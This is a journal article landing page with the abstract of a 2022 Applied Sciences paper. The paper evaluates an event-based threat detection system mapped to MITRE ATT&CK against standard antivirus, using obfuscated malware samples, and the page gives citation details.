Next Article in Journal
Human Vital Signs Detection: A Concurrent Detection Approach
Next Article in Special Issue
LPCP: An efficient Privacy-Preserving Protocol for Polynomial Calculation Based on CRT
Previous Article in Journal
SOA-Based Platform Use in Development and Operation of Automation Solutions: Challenges, Opportunities, and Supporting Pillars towards Emerging Trends
Previous Article in Special Issue
Blockchain Applications in Education: A Systematic Literature Review
Article

Evaluation of Local Security Event Management System vs. Standard Antivirus Software

Institute for Research in Technology, ICAI School of Engineering, Comillas Pontifical University, 28015 Madrid, Spain
*
Author to whom correspondence should be addressed.
Academic Editors: George Drosatos, Konstantinos Rantos and Konstantinos Demertzis
Appl. Sci. 2022, 12(3), 1076; https://doi.org/10.3390/app12031076
Received: 24 December 2021 / Revised: 17 January 2022 / Accepted: 18 January 2022 / Published: 20 January 2022
(This article belongs to the Special Issue Advanced Technologies in Data and Information Security)
The detection and classification of threats in computer systems has been one of the main problems researched in Cybersecurity. As technology evolves, the tactics employed by adversaries have also become more sophisticated to evade detection systems. In consequence, systems that previously detected and classified those threats are now outdated. This paper proposes a detection system based on the analysis of events and matching the risk level with the MITRE ATT&CK matrix and Cyber Kill Chain. Extensive testing of attacks, using nine malware codes and applying three different obfuscation techniques, was performed. Each malicious code was analyzed using the proposed event management system and also executed in a controlled environment to examine if commercial malware detection systems (antivirus) were successful. The results show that evading techniques such as obfuscation and in-memory extraction of malicious payloads, impose unexpected difficulties to standard antivirus software. View Full-Text
Keywords: SIEM; antivirus; event-based threat detection; MITRE; Cyber Kill Chain SIEM; antivirus; event-based threat detection; MITRE; Cyber Kill Chain
Show Figures

Figure 1

MDPI and ACS Style

Pérez-Sánchez, A.; Palacios, R. Evaluation of Local Security Event Management System vs. Standard Antivirus Software. Appl. Sci. 2022, 12, 1076. https://doi.org/10.3390/app12031076

AMA Style

Pérez-Sánchez A, Palacios R. Evaluation of Local Security Event Management System vs. Standard Antivirus Software. Applied Sciences. 2022; 12(3):1076. https://doi.org/10.3390/app12031076

Chicago/Turabian Style

Pérez-Sánchez, Antonio, and Rafael Palacios. 2022. "Evaluation of Local Security Event Management System vs. Standard Antivirus Software" Applied Sciences 12, no. 3: 1076. https://doi.org/10.3390/app12031076

Find Other Styles
Note that from the first issue of 2016, MDPI journals use article numbers instead of page numbers. See further details here.

Article Access Map by Country/Region

1
Back to TopTop